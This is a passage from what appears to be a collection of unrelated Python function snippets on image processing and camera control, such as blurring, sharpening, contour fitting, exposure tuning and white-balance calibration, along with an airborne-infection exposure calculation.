self.sw.right_fit,\n image_size=self.warped_image_size, margin=20)\n lane = self.sw.visualize_lane()\n curve_rad = self.measure_curvature(self.sw.left_fit, self.sw.right_fit)\n offset = self.measure_offset(self.sw.left_fit, self.sw.right_fit)\n else:\n self.curve.find(binary)\n lane = self.curve.visualize_lane()\n curve_rad = self.measure_curvature(self.curve.left_fit, self.curve.right_fit)\n offset = self.measure_offset(self.curve.left_fit, self.curve.right_fit)\n\n non_warped_lane = self.warp_inverse(lane)\n\n result = cv2.addWeighted(image, 1, non_warped_lane, 0.3, 0)\n cv2.putText(result, \"Curve Radius: 
{:.0f}m\".format(curve_rad), (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255))\n cv2.putText(result, \"Off Center: {:.2f}m\".format(offset), (50, 100),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255))\n\n return result", "def blur_slide(self):\r\n std_input = self.horizontal.get() # Get the user STD input\r\n img = self.master.images[-1] # Select the displayed image for transformation\r\n blurred_image = blur.gaussian_blur(img, std_input) # Perform gaussian blurring on the input image\r\n self.master.display_image.display_image(img=blurred_image) # display the blurred image\r\n self.master.images.append(blurred_image) # Append the blurred image to the stack\r", "def process_image( slider_pos ):\n stor = cvCreateMemStorage(0);\n \n # Threshold the source image. This needful for cvFindContours().\n cvThreshold( image03, image02, slider_pos, 255, CV_THRESH_BINARY );\n \n # Find all contours.\n nb_contours, cont = cvFindContours (image02, stor, method=CV_CHAIN_APPROX_NONE)\n \n # Clear images. IPL use.\n cvZero(image02);\n cvZero(image04);\n \n if cont is not None:\n # This cycle draw all contours and approximate it by ellipses.\n for c in cont.hrange():\n count = c.total; # This is number point in contour\n\n # Number point must be more than or equal to 6 (for cvFitEllipse_32f). \n if( count < 6 ):\n continue;\n \n # Alloc memory for contour point set. \n PointArray = cvCreateMat(1, count, CV_32SC2)\n PointArray2D32f= cvCreateMat( 1, count, CV_32FC2)\n \n # Get contour point set.\n cvCvtSeqToArray(c, PointArray.data.ptr, cvSlice(0, CV_WHOLE_SEQ_END_INDEX));\n \n # Convert CvPoint set to CvBox2D32f set.\n cvConvert( PointArray, PointArray2D32f )\n \n box = CvBox2D()\n\n # Fits ellipse to current contour.\n box = cvFitEllipse2(PointArray2D32f);\n \n # Draw current contour.\n cvDrawContours(image04, c, CV_RGB(255,255,255), CV_RGB(255,255,255),0,1,8,cvPoint(0,0));\n \n # Convert ellipse data from float to integer representation.\n center = CvPoint()\n size = CvSize()\n center.x = cvRound(box.center.x);\n center.y = cvRound(box.center.y);\n size.width = cvRound(box.size.width*0.5);\n size.height = cvRound(box.size.height*0.5);\n box.angle = -box.angle;\n \n # Draw ellipse.\n cvEllipse(image04, center, size,\n box.angle, 0, 360,\n CV_RGB(0,0,255), 1, CV_AA, 0);\n \n # Show image. 
HighGUI use.\n cvShowImage( \"Result\", image04 );", "def filterInRange(frame, min, max, colorMode):\n\n tempFrame = cv2.cvtColor(frame, colorMode)\n\n mask = cv2.inRange(tempFrame, min, max)\n mask = cv2.bitwise_not(mask)\n\n filtered_frame = cv2.bitwise_and(frame, frame, mask=mask)\n\n return filtered_frame", "def ring_int(self, tissue):\n print(\"controller - ring_int!\")\n img_cv2_mask = self.pressure_img.ring_ext\n self.pressure_img.roi_crop(img_cv2_mask, tissue, 2)", "def selectOptimalExposureCallback(self):\n rospy.loginfo('Starting automatic exposure selection algorithm')\n\n # Start searching for the optimal exposure\n best_exp_pass1 = self.runPass(range(100, 27100, 3000), rate=self.rate)\n # first pass, find coarse exposure\n if best_exp_pass1 > 0:\n rospy.loginfo('First pass: success!')\n rospy.loginfo(\n 'Best exposure in first pass: {}'.format(best_exp_pass1))\n\n # second pass, refine the exposure\n exp_range = [int(exp) for exp in np.linspace(\n 0.9*best_exp_pass1, 1.1*best_exp_pass1, 10)]\n best_exp_pass2 = self.runPass(exp_range, rate=self.rate)\n\n if best_exp_pass2 > 0:\n rospy.loginfo('Second pass: success!')\n rospy.loginfo(\n 'Best exposure in second pass: {}'.format(best_exp_pass2))\n optimal_exposure = best_exp_pass2\n else:\n rospy.logerr(\n 'Second pass: failure\\nSetting the best exposure found in first pass')\n optimal_exposure = best_exp_pass1\n\n self.client.update_configuration({\"exposure\": optimal_exposure})\n self.reset()\n\n else:\n rospy.logerr(\n 'First pass: failure\\nCould not auto-set the exposure')", "def sharpen_slide(self):\r\n std_input = self.horizontal.get() # Get the std defined by user\r\n c_input = self.vertical.get() # get the constant defined by the user\r\n img = self.master.images[-1] # Use the most recent displayed image for sharpening\r\n sharpened_image = sharpen.gaussian_unsharp_masking(img, std_input, c_input) # Apply unsharp masking on image\r\n self.master.display_image.display_image(img=sharpened_image) # display sharpened image\r\n self.master.images.append(sharpened_image) # Append the sharpened image on the stack\r", "def adjust_brightness(img, brightness_factor):\n check_type(img)\n\n enhancer = ImageEnhance.Brightness(img)\n img = enhancer.enhance(brightness_factor)\n return img", "def draw_exposure_lim(self, skymap):\n\n rightascensions = np.linspace(-180, 180, self.num_points) \n limiting_dec = self.limiting_dec.deg\n boundary_decs = np.tile(limiting_dec, self.num_points)\n c = SkyCoord(ra = rightascensions * u.degree,\n dec = boundary_decs * u.degree, frame = 'icrs')\n lon = c.galactic.l.deg\n lat = c.galactic.b.deg\n\n skymap.scatter(lon, lat, latlon = True, s = 10, \n color = 'k', alpha = 0.1,\n label = 'limit of ' + self.label + '\\'s exposure')", "def create_contrast_slider(self):\n contrast_max = 0\n for scan_dir in self.ff:\n temp_max = np.max(np.abs(scan_dir.data_fft))\n if temp_max > contrast_max:\n contrast_max = temp_max\n\n self.contrast_slider = widgets.IntSlider(min=0, max=100, step=1, value=50, continuous_update=False,\n description='Contrast', readout=False)", "def calibrate_white_balance(self, channel: LC):\n\n d_print(\"Warming up camera sensor...\", 1)\n\n # turn on channel light\n self.light_control(channel, 1)\n\n if channel == LC.WHITE:\n with picamera.PiCamera() as sensor:\n # set up the sensor with all its settings\n sensor.resolution = (128, 80)\n sensor.rotation = self.config[\"rotation\"]\n sensor.framerate = self.settings.framerate[channel]\n sensor.shutter_speed = 
self.settings.shutter_speed[channel]\n\n # set up the blue and red gains\n sensor.awb_mode = \"off\"\n rg, bg = (1.1, 1.1)\n sensor.awb_gains = (rg, bg)\n\n # now sleep and lock exposure\n time.sleep(20)\n sensor.exposure_mode = self.settings.exposure_mode\n\n # record camera data to array and scale up a numpy array\n #rgb = np.zeros((1216,1216,3), dtype=np.uint16)\n with picamera.array.PiRGBArray(sensor) as output:\n # capture images and analyze until convergence\n for i in range(30):\n output.truncate(0)\n sensor.capture(output, 'rgb')\n rgb = np.copy(output.array)\n\n #crop = rgb[508:708,666:966,:]\n crop = rgb[30:50,32:96,:]\n\n r, g, b = (np.mean(crop[..., i]) for i in range(3))\n d_print(\"\\trg: {:4.3f} bg: {:4.3f} --- ({:4.1f}, {:4.1f}, {:4.1f})\".format(rg, bg, r, g, b), 1)\n\n if abs(r - g) > 1:\n if r > g:\n rg -= 0.025\n else:\n rg += 0.025\n if abs(b - g) > 1:\n if b > g:\n bg -= 0.025\n else:\n bg += 0.025\n\n sensor.awb_gains = (rg, bg)\n else:\n rg = self.settings.wb[LC.GROWTH][\"r\"]\n bg = self.settings.wb[LC.GROWTH][\"b\"]\n\n # turn off channel light\n self.light_control(channel, 0)\n\n self.config[\"wb\"][channel] = dict()\n self.config[\"wb\"][channel][\"r\"] = rg\n self.config[\"wb\"][channel][\"b\"] = bg\n\n d_print(\"Done.\", 1)", "def apply_mask(frame):\n # resize blur it, and convert fame to the HSV\n #frame = imutils.resize(frame, width=FRAME_W, height=FRAME_H)\n frame = cv2.resize(frame, (FRAME_W, FRAME_H), interpolation=3)\n blurred = cv2.GaussianBlur(frame, (11, 11), 0)\n hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)\n\n #mask colour out and clean up the mask\n mask = cv2.inRange(hsv, GREEN_LOWER, GREEN_UPPER)\n mask = cv2.erode(mask, None, iterations=2)\n mask = cv2.dilate(mask, None, iterations=2)\n\n return frame, mask", "def resetCamera(self, bounds):\n\n center = 0.5 * (bounds[0] + bounds[1])\n radius = numpy.linalg.norm(0.5 * (bounds[1] - bounds[0]))\n if radius == 0.: # bounds are all collapsed\n radius = 1.\n\n if isinstance(self.intrinsic, transform.Perspective):\n # Get the viewpoint distance from the bounds center\n minfov = numpy.radians(self.intrinsic.fovy)\n width, height = self.intrinsic.size\n if width < height:\n minfov *= width / height\n\n offset = radius / numpy.sin(0.5 * minfov)\n\n # Update camera\n self.extrinsic.position = \\\n center - offset * self.extrinsic.direction\n self.intrinsic.setDepthExtent(offset - radius, offset + radius)\n\n elif isinstance(self.intrinsic, transform.Orthographic):\n # Y goes up\n self.intrinsic.setClipping(\n left=center[0] - radius,\n right=center[0] + radius,\n bottom=center[1] - radius,\n top=center[1] + radius)\n\n # Update camera\n self.extrinsic.position = 0, 0, 0\n self.intrinsic.setDepthExtent(center[2] - radius,\n center[2] + radius)\n else:\n raise RuntimeError('Unsupported camera: %s' % self.intrinsic)", "def increase_brightness(image, value=18):\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n\n lim = 255 - value\n v[v > lim] = 255\n v[v <= lim] += value\n\n final_hsv = cv2.merge((h, s, v))\n image = cv2.cvtColor(final_hsv, cv2.COLOR_HSV2BGR)\n return image", "def equalize_exposure(image, iterations=1, kernel_size=None, min_object_size=500, dark_objects=True, stretch=False):\n\n # Housekeeping\n img = img_as_float(image.copy())\n\n if stretch is True:\n img = img/img.max()\n\n if dark_objects is False:\n img = 1-img # invert\n\n img_in = img.copy() # for use later\n\n if kernel_size is None:\n kernel_size = np.int(max(image.shape[0], image.shape[1])/10)\n\n # mean 
filter kernel\n kernel = morphology.disk(int(kernel_size/2))\n\n # identify objects to ignore\n if kernel_size % 2 is 0:\n block_size = kernel_size + 1\n else:\n block_size = kernel_size\n\n #objects = ~filters.threshold_adaptive(img, block_size, offset = 0.01*img.max()) # deprecated function\n objects = img > filters.threshold_local(img, block_size, offset = 0.01*img.max())\n objects = morphology.remove_small_objects(objects, min_size = min_object_size)\n\n # Correct Exposure x times\n i = 0\n while i < iterations:\n # Global mean\n img_mean = np.ma.masked_array(img, mask=objects).mean()\n\n # global means\n local_means = filters.rank.mean(img, selem=kernel, mask=~objects)\n local_means = filters.gaussian(local_means, kernel_size)\n\n # Correct Image\n img += (img_mean - local_means)\n img[img>1] = 1 # for compatibilty with img_as_float\n img[img<0] = 0 # for compatibilty with img_as_float\n i += 1\n\n out = img_as_float(img)\n\n return(out)", "def apply(self,src,dst):\n cv2.filter2D(src,-1,self._kernel,dst) #The second argument specifies the per-channel depth of the destination image\n #(such as cv2.CV_8U for 8 bits per channel). A negative value (as used here) means\n #that the destination image has the same depth as the source image.", "def enhance_contrast(img):\n for y in range(frame_height):\n for x in range(frame_width):\n if img[y, x, 1] > 100:\n # range of blues to limit of puppet motion 255/(frame_width - 150)\n img[y][x][0] = x*0.4\n if img[y, x, 1] <= 100:\n img[y][x][2] = img[y][x][2]*0.5\n cv2.imwrite(\"contrasted.png\", img)", "def __init__(self,\n low,\n high,\n clipping_lower_bound=-np.inf,\n clipping_upper_bound=np.inf):\n super().__init__()\n self._low = low\n self._high = high\n self._clipping_lower_bound = clipping_lower_bound\n self._clipping_upper_bound = clipping_upper_bound", "def _fcn_minmax_roi(self):\n self.roi._update_cbar_minmax()\n self.cbqt.cbobjs._objs['roi']['clim'] = self.roi._clim\n kwargs = self.cbqt.cbobjs._objs['roi'].to_kwargs(True)\n self.roi.update_from_dict(kwargs)\n self.roi._update_cbar()", "def skywalker(this, **kargs):\n\t\t\n\t\t# Arguments\n\t\tbin = kargs.get('bin', this._BINARY)\n\t\toffshore = kargs.get('offshore', 5)\n\t\tminSize = kargs.get('minSize', 3)\n\t\tblur = kargs.get('blur', False)\n\t\t\n\t\tif blur: # Flou de test\n\t\t\tkernel = np.ones((3, 3), np.float32)/9\n\t\t\tbin = cv2.filter2D(bin, -1, kernel)\n\t\t\n\t\t# On duplique l'image pour le rendu final\n\t\tscan = EmptyFrom(bin, 3)\n\t\tscan[:,:,0] = scan[:,:,1] = scan[:,:,2] = bin\n\t\tthis._SCAN = scan\n\t\t\n\t\tstep = 0 # Compteur de pas dans le vide\n\t\tstart, end = None, None\n\t\t\n\t\t# Dimensions de l'image à scanner\n\t\tsize = D2Point(width(bin), height(bin))\n\t\tratio = size if minSize < 1 else 1\n\t\t\n\t\t# Scan pixel par pixel, en partant du bas\n\t\tfor v in xrange(int(size.y)-1, -1, -1):\n\t\t\tfor u in xrange(int(size.x)):\n\t\t\t\n\t\t\t\tif bin.item((v, u)): # Si un pixel != 0:\n\t\t\t\t\tscan[v,u] = [0, 0, 255] # Rouge.\n\t\t\t\t\tstep = 0 # On reset le jump\n\t\t\t\t\t\n\t\t\t\t\t# Si c'est le premier\n\t\t\t\t\tif not start:\n\t\t\t\t\t\tstart = D2Point(u, v)\n\t\t\t\t\t\tend = D2Point(u, v)\n\t\t\t\t\telse: # On trace\n\t\t\t\t\t\tend.x, end.y = u, v\n\t\t\t\t\n\t\t\t\telif end:\n\t\t\t\t\tif step < offshore:\n\t\t\t\t\t\tscan[v,u] = [0, 255, 255] # Jaune\n\t\t\t\t\t\tstep += 1 # On continue\n\t\t\t\t\telif abs((start - end)/ratio) < minSize:\n\t\t\t\t\t\tstart, end = None, None\n\t\t\t\t\telse: break\n\t\t\t\t# elif end: break\n\t\t\t###\n\t\t\tif 
end: break\n\t\t###\n\t\t\n\t\tif end: # Si on a trouvé une fin\n\t\t\t\n\t\t\t# Point médian = doigt\n\t\t\tresult = start % end\n\t\t\t\n\t\t\t# Visuel\n\t\t\tscan[:,result.x,:] = [0, 255, 0] # On trace une bande verte\n\t\t\tscan[result.y,:,:] = [0, 127, 0] # On trace une autre bande verte\n\t\t\t\n\t\t\t# Reformatage\n\t\t\tresult /= size-1 # On remet en ratio d'image\n\t\t\tresult.x = 1 - result.x # On inverse le côté de mesure\n\t\t\t\n\t\t\t# Stockage\n\t\t\tthis._DETECTED = result # On stocke le point détecté\n\t\t\tthis._BOTTOM = result.y == 1 # On clic ou bien ?\n\t\t\n\t\t# Si rien\n\t\telse:\n\t\t\tresult = None\n\t\t\tthis._BOTTOM = False\n\t\t\n\t\t# Tchao\n\t\treturn result", "def update():\n # TODO: Park the car 30 cm away from the closest orange cone.\n # Use both color and depth information to handle cones of multiple sizes.\n # You may wish to copy some of your code from lab2b.py\n global speed\n global angle\n global curState\n # Search for contours in the current color image\n update_contour()\n\n imgX = rc.camera.get_width()\n\n depth_image = rc.camera.get_depth_image()\n depth_image_adjust = (depth_image - 0.01) % 9999\n depth_image_adjust_blur = cv.GaussianBlur(depth_image_adjust, (11,11), 0)\n\n contour_x = contour_center[1]\n contour_y = contour_center[0]\n\n if contour_center is not None:\n angle = rc_utils.remap_range(contour_center[1],0,imgX,-1,1)\n\n contour_distance = depth_image_adjust_blur[contour_y][contour_x]\n\n print(contour_distance)\n # TODO: Park the car 30 cm away from the closest orange cone\n if curState == State.search:\n rc.drive.set_speed_angle(0.5, 1)\n \n if contour_center is not None:\n curState = State.approach\n\n elif curState == State.approach:\n # rc.drive.set_speed_angle(0.5, angle)\n\n if contour_distance > 50:\n rc.drive.set_speed_angle(0.3,angle)\n elif contour_distance > 32:\n rc.drive.set_speed_angle(0.1,angle)\n elif contour_distance == 32:\n rc.drive.set_speed_angle(-0.1,angle)\n elif contour_distance < 32:\n curState = State.stop\n print(\"stop\")\n\n elif curState == State.stop:\n rc.drive.set_speed_angle(0,0)\n\n pass", "def toggle_exposure(self):\n\n checked1 = self.exp1_radio.isChecked()\n if checked1:\n self.exp2_radio.setChecked(True)\n else:\n self.exp1_radio.setChecked(True)\n self.select_exposure()", "def create_seam_cut(orig_scene, mask_scene, \n match_scene=None, orig_scene_no_mask=None):\n \n if match_scene == None:\n match_scene = np.ones(orig_scene.shape) * 255\n match_scene[orig_scene.shape[0], orig_scene.shape[1]] = 0\n if orig_scene_no_mask == None:\n orig_scene_no_mask = np.ones(orig_scene.shape) * 255\n orig_scene_no_mask[orig_scene.shape[0], orig_scene.shape[1]] = 0\n \n \n diff = np.absolute(np.subtract(match_scene, orig_scene))\n diff_gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY).astype(np.float)\n \n for x in range(mask_scene.shape[0]):\n for y in range(mask_scene.shape[1]):\n if mask_scene[x,y] == 0:\n diff_gray[x,y] = np.inf\n \n mask_info = np.where(mask_scene == 0)\n\n min_x, max_x, min_y, max_y = min(mask_info[0]), max(mask_info[0]), min(mask_info[1]), max(mask_info[1])\n #print min_x, max_x, min_y, max_y\n \n # make 4 cuts, top left to top right, top left to bottom left, top right to bottom right and bottom left to bottom right.\n adj = 10\n dim_diff = diff_gray.shape\n\n\n NW_top = zip([0]*len(range(0, min_y-adj)), range(0, min_y-adj))\n NW_left = zip(range(0, min_x-adj), [0]*len(range(0, min_x-adj))) \n top_left = NW_top + NW_left\n\n NE_top = zip([0]*len(range(max_y+adj, dim_diff[1])), 
range(max_y+adj, dim_diff[1]))\n NE_right = zip(range(0, min_x-adj), [dim_diff[1]-1]*len(range(0, min_x-adj)))\n top_right = NE_top + NE_right\n\n\n SW_left = zip([dim_diff[0]-1]*len(range(0, min_y-adj)), range(0, min_y-adj))\n SW_bot = zip(range(max_x + adj, dim_diff[0]), [0]*len(range(max_x + adj, dim_diff[0])))\n bottom_left = SW_left + SW_bot\n\n SE_right = zip([dim_diff[0]-1]*len(range(max_y+adj, dim_diff[1])), range(max_y+adj, dim_diff[1]))\n SE_bot = zip(range(max_x + adj, dim_diff[0]), [dim_diff[1]-1]*len(range(max_x + adj, dim_diff[0])))\n bottom_right = SE_right + SE_bot\n \n diff_path = np.zeros(diff_gray.shape)\n \n try: \n costMCP = skimage.graph.MCP(diff_gray, fully_connected=True)\n cumpath, trcb = costMCP.find_costs(starts=NW_left, ends=NE_right)\n \n for _ in range(10):\n path_tltr = costMCP.traceback(choice(NE_right)) # select a random end point\n for x,y in path_tltr:\n diff_path[x, y] = 255 \n except:\n pass\n \n try:\n costMCP = skimage.graph.MCP(diff_gray, fully_connected=True)\n cumpath, trcb = costMCP.find_costs(starts=NW_top, ends=SW_bot)\n \n # get 10 random paths...\n for _ in range(10):\n path_tlbl = costMCP.traceback(choice(SW_bot))\n for x,y in path_tlbl:\n diff_path[x, y] = 255 \n except:\n pass\n\n try:\n costMCP = skimage.graph.MCP(diff_gray, fully_connected=True)\n cumpath, trcb = costMCP.find_costs(starts=NE_top, ends=SE_bot)\n \n # get 10 random paths...\n for _ in range(10):\n path_trbr = costMCP.traceback(choice(SE_bot))\n for x,y in path_trbr:\n diff_path[x, y] = 255\n except:\n pass\n \n try:\n costMCP = skimage.graph.MCP(diff_gray, fully_connected=True)\n cumpath, trcb = costMCP.find_costs(starts=SW_left, ends=SE_right)\n \n \n # get 10 random paths...\n for _ in range(10):\n path_blbr = costMCP.traceback(choice(bottom_right))\n for x,y in path_blbr:\n diff_path[x, y] = 255\n except:\n pass\n \n #use flood fill to add in the mask area.\n \n h,w = diff_path.shape\n mask = np.zeros((h+2,w+2),np.uint8) \n diff = (1,1)\n # make sure you recast the type\n #plt.imshow(diff_path)\n \n # select random point in the mask\n orig_mask = np.where(orig_scene_no_mask == 0)\n \n #print diff_path.shape, (orig_mask[0][rnd_point], orig_mask[1][rnd_point])\n #print mask.shape\n for _ in range(10):\n try:\n rnd_point = choice(range(len(orig_mask[0]))) \n diff_fill = cv2.floodFill(diff_path.astype(np.uint8),mask,\n (orig_mask[0][rnd_point], orig_mask[1][rnd_point]), (255, 255),diff,diff)[1] \n break\n except:\n pass\n # to make floodfill work\n # erode and dialate the result...\n kernel = np.ones((5,5),np.uint8)\n diff_fill = cv2.erode(diff_fill, kernel, iterations = 2)\n diff_fill = cv2.dilate(diff_fill, kernel, iterations = 2)\n \n # blur and threshold...\n diff_fill = cv2.blur(diff_fill, (10,10))\n diff_fill = cv2.threshold(diff_fill, 5, 255, cv2.THRESH_BINARY)[1]\n return np2to3(diff_fill)", "def find_exposure_time(cam,targetIntensity=100,margin=5):\n from numpy import mean\n\n if targetIntensity < 0 or targetIntensity > 255:\n print(\"Invalid target intensity\")\n return 1\n minExposure = 0.01 # Smallest value in ms\n maxExposure = 80\n counter = 0\n\n # Calculate exposures at the different end\n Image = cam.grab_image(timeout='1s', copy=True,\n exposure_time=number_to_millisecond(minExposure))\n minIntensity = mean(Image)\n\n Image = cam.grab_image(timeout='1s', copy=True,\n exposure_time=number_to_millisecond(maxExposure))\n maxIntensity = mean(Image)\n\n midIntensity = 1\n while midIntensity < (targetIntensity - margin) or\\\n midIntensity > 
(targetIntensity+margin) and counter < 20:\n # Set exposure, take a picture and check how good it was\n counter = counter + 1\n\n midExposure = (maxExposure + minExposure) / 2\n Image = cam.grab_image(timeout='1s',\n copy=True,\n exposure_time=number_to_millisecond(midExposure))\n midIntensity = mean(Image)\n\n if midIntensity > targetIntensity: # Exposure time too short\n maxExposure = midExposure\n # maxIntensity = midIntensity\n else: # Exposure time too long\n minExposure = midExposure\n # minIntensity = midIntensity\n if counter == 100:\n print(\"WARNING: Find exposure function ran max number of iterations!\\\n No really suitable exposure setting found\")\n # Update the exposure time of the camera and return the target exposure\n cam.set_defaults(exposure_time=number_to_millisecond(midExposure))\n return midExposure#number_to_millisecond(midExposure)", "def edge_detector_released(self, event):\r\n if self.winfo_containing(event.x_root, event.y_root) == self.edge_detector_button: # Clicked area has edge\r\n # detector button\r\n if self.image_present_check(): # Check if image is displayed, else throw error message box\r\n self.horizontal = Scale(self, from_=0.00, to=255.00, resolution = 0.5, orient=HORIZONTAL) # Slider for\r\n # adjusting the threshold of Sobel Detector\r\n self.horizontal.pack() # Pack the slider in the GUI window\r\n edge_detect_button = Button(self, text = \"Set threshold\", command = self.edge_detect_slide).pack()\r\n # Button for the user to change the threshold. It will call edge_detect_slide whenever\r\n # the button is pressed\r", "def sharpening_released(self, event):\r\n if self.winfo_containing(event.x_root, event.y_root) == self.sharpening_button: # If clicked area contains the \r\n # sharpening button\r\n if self.image_present_check(): # Check if image is being displayed, if not throw error box.\r\n self.horizontal = Scale(self, from_=0.00, to=100.00, resolution = 0.5, orient=HORIZONTAL) # Slider for \r\n # taking the STD of gaussian kernel\r\n self.horizontal.pack() # pack the slider onto GUI screen\r\n self.vertical = Scale(self, from_=0.00, to=100.00, resolution = 0.5, orient=VERTICAL) # Slider for\r\n # taking the value of the constant\r\n self.vertical.pack() # pack the slider onto GUI screen\r\n sharpen_button = Button(self, text=\"Set sharpening constants\", command=self.sharpen_slide).pack()\r\n # Button which the user clicks to set the input. 
On clicking, the sharpen_slide function is called\r", "def deposited_exposure_between_bounds(self, time1: float, time2: float) -> _VectorisedFloat:\n deposited_exposure: _VectorisedFloat = 0.\n for interaction in self.short_range:\n start, stop = interaction.extract_between_bounds(time1, time2)\n short_range_jet_exposure = interaction._normed_jet_exposure_between_bounds(\n self.concentration_model, start, stop)\n short_range_lr_exposure = interaction._normed_interpolated_longrange_exposure_between_bounds(\n self.concentration_model, start, stop)\n dilution = interaction.dilution_factor()\n\n fdep = interaction.expiration.particle.fraction_deposited(evaporation_factor=1.0)\n diameter = interaction.expiration.particle.diameter\n \n # Aerosols not considered given the formula for the initial\n # concentration at mouth/nose.\n if diameter is not None and not np.isscalar(diameter):\n # We compute first the mean of all diameter-dependent quantities\n # to perform properly the Monte-Carlo integration over\n # particle diameters (doing things in another order would\n # lead to wrong results for the probability of infection).\n this_deposited_exposure = (np.array(short_range_jet_exposure\n * fdep).mean()\n - np.array(short_range_lr_exposure * fdep).mean()\n * self.concentration_model.infected.activity.exhalation_rate)\n else:\n # In the case of a single diameter or no diameter defined,\n # one should not take any mean at this stage.\n this_deposited_exposure = (short_range_jet_exposure * fdep\n - short_range_lr_exposure * fdep\n * self.concentration_model.infected.activity.exhalation_rate)\n\n # Multiply by the (diameter-independent) inhalation rate\n deposited_exposure += (this_deposited_exposure *\n interaction.activity.inhalation_rate\n /dilution)\n\n # Then we multiply by diameter-independent quantities: viral load\n # and fraction of infected virions\n f_inf = self.concentration_model.infected.fraction_of_infectious_virus()\n deposited_exposure *= (f_inf\n * self.concentration_model.virus.viral_load_in_sputum\n * (1 - self.exposed.mask.inhale_efficiency()))\n # Long-range concentration\n deposited_exposure += self.long_range_deposited_exposure_between_bounds(time1, time2)\n\n return deposited_exposure", "def test_edit_blurred_image(self):\n blur_input_image = np.array([\n 0.28641213, 0.32315277, 0.3871898, 0.46174035, 0.52684723, 0.56466555\n ])\n expected_image_lower = np.array([\n 0.384, 0.395, 0.414, 0.435, 0.454, 0.465\n ])\n expected_image_upper = np.array([\n 0.385, 0.396, 0.415, 0.436, 0.455, 0.466\n ])\n output_config = FilterImageConfig()\n output_config.effect.sigma = 3\n output_config.blur.linear = True\n output = localHDR.blur_image(blur_input_image, output_config.blur)\n output_config.mode = \"global\"\n output_config.lum_scale = 10\n output_config.chrom_scale = .2\n self.assertTrue(np.allclose(output, expected_image_lower, atol=6e-03))\n self.assertTrue(np.allclose(output, expected_image_upper, atol=6e-03))", "def select_exposure(self):\n exp1_selected = self.exp1_radio.isChecked()\n\n if self.recording_sequence:\n self.record_sequence() # stop current recording\n\n if exp1_selected: # then exp1\n ifi_ndx = self.exp1_ifi_select.currentIndex()\n self.camera.set_exposure(self.exp1_select.currentIndex(), ifi_ndx)\n else:\n ifi_ndx = self.exp2_ifi_select.currentIndex()\n self.camera.set_exposure(self.exp2_select.currentIndex(), ifi_ndx)\n\n temp = list(self.dpar.iwindow_toggle_save)\n self.dpar.iwindow_toggle_save = list(self.dpar.iwindow[0])\n self.dpar.iwindow[0] = temp\n 
self._update_scrollbars()\n\n self.rec_seq_button.setEnabled(ifi_ndx > 0)\n\n et = np.int(np.round(self.camera.actual_exposure_time_ms))\n self.write_to_log('Exposure %d ms' % et)", "def find_components(image,deltaPix,lens_rad_arcsec = 6.0,lens_rad_ratio = None,\n center_x = None,center_y = None, gal_rad_ratio = 0.1,\n min_size_arcsec=0.7,thresh=0.5, many_sources = True,\n show_locations=False, title = None):\n\n # convert minimum component size in pixel units\n min_size = int(min_size_arcsec / deltaPix)\n \n #Convert lens radius and central galaxy radius to pixels\n if lens_rad_ratio == None:\n lens_rad = int(lens_rad_arcsec / deltaPix)\n else: lens_rad = int(len(image) * lens_rad_ratio)\n gal_rad = int(len(image) * gal_rad_ratio)\n \n \n# im2[im2 < im2.min() + 10.*thresh] = 0.\n \n # downscale source image to data resolution (for speed + easier for converting to data units)\n #down = image_util.re_size(image, factor=supersampling_factor_source)\n \n # apply laplacian of gaussian (LoG) filter to enhance maxima\n LoG = - gaussian_laplace(deepcopy(image), sigma = min_size, mode='constant', cval=0.) \n \n# LoG = - gaussian_laplace(deepcopy(im2), sigma = 2., mode='constant', cval=0.)\n \n filtered = deepcopy(LoG)\n \n# print(LoG.min(),LoG.max(),np.abs(LoG.min()) + thresh )\n \n# print(type(filtered))\n \n #background mean and std of filtered image \n corners = np.zeros([4,5,5])\n corners[0] = LoG[0:5,0:5]\n corners[1] = LoG[-5:,0:5]\n corners[2] = LoG[0:5,-5:]\n corners[3] = LoG[-5:,-5:]\n means = []\n stds = []\n for c in corners:\n mn,med,s = sigma_clipped_stats(c,sigma=3.0)\n means.append(mn)\n stds.append(s)\n \n stds=np.array(stds)\n means = np.array(means)\n means_std = np.std(means)\n# means_good = means[(means >= means.mean() - 1.0 * means_std) & (means <= means.mean() + 1.0 * means_std)]\n means_good = means[(np.abs(means) <= np.abs(means).min() + 1.0 * means_std)]\n mean_bg = np.mean(means_good)\n std_bg = np.mean(stds[(np.abs(means) <= np.abs(means).min() + 1.0 * means_std)])\n# print('LoG means: {}, Log means std: {}, Log means good: {}, LoG avg mean: {}'.format(means,means_std,means_good,mean_bg))\n# print('min: {}, max: {}, cut: {}'.format(LoG.min(),LoG.max(),mean_bg + thresh))\n# print(LoG.min(),LoG.max(),filtered.min() + thresh)\n \n \n # assume all value below max*threshold can not be maxima, so put all to zero\n# filtered[filtered < thresh*filtered.max()] = 0.\n \n# assume all value below min*threshold can not be maxima, so put all to zero\n# filtered[filtered < filtered.min() + thresh * np.abs(filtered.min())] = 0.\n# filtered[filtered < mean_bg + thresh] = 0.\n filtered[filtered < mean_bg + 6.*std_bg] = 0. #set pixels below the mean + 6x threshold to 0\n \n # find coordinates of local maxima\n #print(int(0.5 * min_size))\n max_idx_2d_small = peak_local_max(filtered, min_distance=0) #All bright pixels\n max_idx_2d_large = peak_local_max(filtered, min_distance=1) #peaks with min size of 1 pixel\n \n x_list_small, y_list_small = max_idx_2d_small[:, 1], max_idx_2d_small[:, 0]\n x_list_large, y_list_large = max_idx_2d_large[:, 1], max_idx_2d_large[:, 0]\n \n im_center_x, im_center_y = len(image) / 2., len(image) / 2. 
